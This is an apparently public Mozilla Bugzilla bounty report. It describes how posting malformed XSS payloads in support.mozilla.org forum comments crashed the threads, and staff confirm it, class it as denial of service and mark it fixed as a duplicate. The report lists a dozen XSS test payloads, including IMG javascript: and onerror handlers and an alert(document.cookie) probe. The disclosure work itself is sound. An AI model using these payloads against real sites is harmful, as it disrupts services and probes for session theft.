Malformed injected <IMG> tag Crashes Forums Topic and questions on support.mozilla.org
Categories
(support.mozilla.org :: General, defect)
Tracking
(Not tracked)
People
(Reporter: alisyarief.404, Unassigned)
References
()
Details
(Keywords: reporter-external, wsec-dos, Whiteboard: [reporter-external] [web-bounty-form] [verif?])
Attachments
(1 file)
|
914 bytes,
text/plain
|
Details |
Paylod XSS (minor) to Crash Forums Topic
- Login website https://support.mozilla.org/
- Go to https://support.mozilla.org/id/forums/
- Comment on Thread Topic with payload below
javascript:/--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[/[]/+alert(1)//'>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=javascript:alert("RSnake says, 'XSS'")>
\<a onmouseover="alert(document.cookie)">xxs link\</a>
\<a onmouseover=alert(document.cookie)>xxs link\</a>
<IMG SRC=# onmouseover="alert('xxs')">
<IMG onmouseover="alert('xxs')">
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
<img src=x onerror="javascript:alert('XSS')">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC="jav
ascript:alert('XSS');">
- After comment on topic Forums, thread forums crash and alert :
An Error Occurred
Oh, no! It looks like an unexpected error occurred. We've already notified the site administrators. Please try again now, or in a few minutes.
- This not Denial-of-service attack or Rate Limit, because this payload impact only user support.mozilla.org
Impact :
This Dangerous!!! because All Thread Topic on Forum is crash and cannot Error Occurred, and user cannot access this thread.
Supporting Material/References:
Because the proof of concept video file is too big, I uploaded it on youtube and the setting not public :
Thanks
After im research Payload XSS to crash Forum Topics :
<IMG SRC="jav ascript:alert('XSS');">
Thanks
|
||
Comment 3•4 years ago
|
||
Hello Kang,
Thank you for your report.
I can confirm that posting the XSS payload in the comment on a question or forum results in denial of service for the question or forum thread.
The payload that worked for me was <IMG SRC="jav
ascript:alert('XSS');">
Thanks,
Frida
|
|
||
Updated•4 years ago
|
|
||
Updated•4 years ago
|
(In reply to Frida Kiriakos [:frida] from comment #3)
Hello Kang,
Thank you for your report.
I can confirm that posting the XSS payload in the comment on a question or forum results in denial of service for the question or forum thread.
The payload that worked for me was
<IMG SRC="jav
ascript:alert('XSS');">Thanks,
Frida
hy Frida this finding not denial of service but Malformed injected
A Denial-of-Service (DoS) attack is an attack meant to shut down a machine or network, making it inaccessible to its intended users.
This not DOS but inject code to crash menu because this 1 send payload not distributed
Thanks
|
|
||
Comment 5•4 years ago
|
||
We consider this bug as Denial of Service since the payload we use in the comments is causing an error on the server side which results in denying access to the topic or question for other users. DoS attack is indeed an attack on the machine or network to make it inaccessible to users and also it includes interruption to an application by exploiting an issue in the application, https://owasp.org/www-community/attacks/Denial_of_Service.
|
|
||
Comment 7•4 years ago
•
|
||
Of course, the team have already worked on the fix in bug 1762414 and we will let you know when this is deployed so we can verify the fix.
Thanks,
Frida
|
||
Comment 8•4 years ago
|
||
This is a duplicate of bug 1762414 which has been fixed in prod
|
|
||
Comment 9•4 years ago
|
||
We we consider the bounty award in the duplicate bug; this turned out to be a symptom of the same parser bug.
|
|
||
Updated•4 years ago
|
|
||
Updated•1 year ago
|
Description
•